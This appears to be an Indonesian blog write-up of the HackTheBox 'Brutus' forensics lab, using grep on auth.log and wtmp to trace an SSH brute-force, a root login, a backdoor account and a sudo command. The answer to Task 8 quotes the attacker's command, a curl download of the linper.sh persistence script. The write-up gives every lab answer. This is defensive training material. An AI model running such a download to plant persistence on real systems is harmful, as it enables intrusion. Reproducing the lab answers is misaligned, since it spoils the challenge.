HackTheBox — Brutus
HackTheBox — Brutus

Author : Shiro
Hai guys, kembali lagi di writeup saya. Kali ini kita akan menyelesaikan hackthebox — Brutus. Langsung aja ke pembahasannya.
-Notes : saya pakai nethunter untuk menyelesaikan htb kali ini
SKENARIO :
Dalam Sherlock yang sangat mudah ini, Anda akan mengenal log Unix auth.log dan wtmp. Kita akan menjelajahi skenario di mana server Confluence diserang secara brute-force melalui layanan SSH-nya. Setelah mendapatkan akses ke server, penyerang melakukan aktivitas tambahan, yang dapat kita lacak menggunakan auth.log. Meskipun auth.log terutama digunakan untuk analisis brute-force, kita akan menggali potensi penuh artefak ini dalam investigasi kita, termasuk aspek peningkatan hak akses, persistensi, dan bahkan beberapa visibilitas ke dalam eksekusi perintah
Misi kita yaitu menggali potensi penuh artefak tersebut.
Penyelesaian :
Kita download dulu file Brutus.zip dari web htb.
untuk unzip kita install tools 7z terlebih dahulu.
sudo apt update
sudo apt install p7zip-full -y
Setelah berhasil install 7z sekarang ekstrak Brutus.zip nya.
7z x brutus.zip
password nya yaitu : hacktheblue
Setelah berhasil di unzip, terdapat 3 file hasil ekstrak, yaitu auth.log , utmp.py, dan wtmp. File-file inilah yang akan kita analisis selanjutnya.
TASK 1 :
Analisis file auth.log. Berapa alamat IP yang digunakan penyerang untuk melakukan serangan brute force?
Hint :

Kita pakai kombinasi command cat & grep untuk membuka file dan mencari kata kunci :
cat auth.log | grep -i "failed"

Jawaban : 65.2.161.68
TASK 2 :
Upaya serangan brute force berhasil dan penyerang mendapatkan akses ke sebuah akun di server. Apa nama pengguna akun tersebut?
Hint :

Sama seperti soal 1, kita hanya ganti failed menjadi accepted :
cat auth.log | grep -i "accepted"

Jawaban : root
TASK 3 :
Identifikasi stempel waktu UTC saat penyerang masuk secara manual ke server dan membuat sesi terminal untuk melaksanakan tujuannya. Waktu masuk akan berbeda dengan waktu otentikasi, dan dapat ditemukan dalam artefak wtmp.
Hint :

Gunakan command berikut sebagai pengganti utmpdump :
python3 utmp.py wtmp -o wtmp.tsv
Selanjutnya kita buka dan cari ip si penyerang :
cat wtmp.tsv | grep “65.2.161.68" wtmp.tsv

Jawaban : 2024-03-06 06:32:45
TASK 4 :
Sesi login SSH dilacak dan diberi nomor sesi setelah login. Berapakah nomor sesi yang diberikan kepada sesi penyerang untuk akun pengguna dari Pertanyaan 2?
Hint :

Lihat isi auth.log dan cari kata kunci “new session” dan “root” :
cat auth.log | grep -i "new session" | grep -i "root"

Pada jawaban nomor 3, waktu sesi login manual yang berhasil yaitu 06:32:45, jadi jumlah sesi yang ditetapkan untuk sesi penyerang pada akun pengguna adalah 37 karena waktunya yang mendekati.
Jawaban : 37
TASK 5 :
Penyerang menambahkan pengguna baru sebagai bagian dari strategi persistensi mereka di server dan memberikan hak akses yang lebih tinggi kepada akun pengguna baru ini. Apa nama akun tersebut?
Hint :

Lihat isi auth.log dan cari “useradd” :
cat auth.log | grep -i "useradd"

Jawaban : cyberjunkie
TASK 6 :
Apa ID sub-teknik MITRE ATT&CK yang digunakan untuk mempertahankan akses dengan membuat akun baru?

Jawaban ini bisa kita searching saja.

Jawaban : T1136.001
TASK 7 :
Pukul berapa sesi SSH pertama penyerang berakhir menurut auth.log?
Gunakan command cat dan grep :
cat auth.log | grep -i "session closed" | grep -i "root" | grep -i "ssh"

Jawaban : 2024-03-06 06:37:24
TASK 8 :
Penyerang masuk ke akun backdoor mereka dan menggunakan hak akses yang lebih tinggi untuk mengunduh sebuah skrip. Apa perintah lengkap yang dieksekusi menggunakan sudo?
Hint :

Lihat isi auth.log dan cari kata kunci “command” :
cat auth.log | grep -i "command"

Jawaban : /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Sekian penyelesaian tugas hackthebox — Brutus kali ini. Semoga dapat bermanfaat bagi teman-teman semua.
Bila ada Kritik, saran dan masukan silahkan berkomentar dibawah dengan ucapan yang sopan dan ramah. ^^
메타데이터
- post_id
- 7d935d0a076f
- slug
- hackthebox-brutus-7d935d0a076f
- url
- https://medium.com/@rafiramdanu221/hackthebox-brutus-7d935d0a076f
- canonical_url
- https://medium.com/@rafiramdanu221/hackthebox-brutus-7d935d0a076f
- author_url
- https://medium.com/@rafiramdanu221
- status
- ok
- fetched_at
- 2026-07-15 18:56:44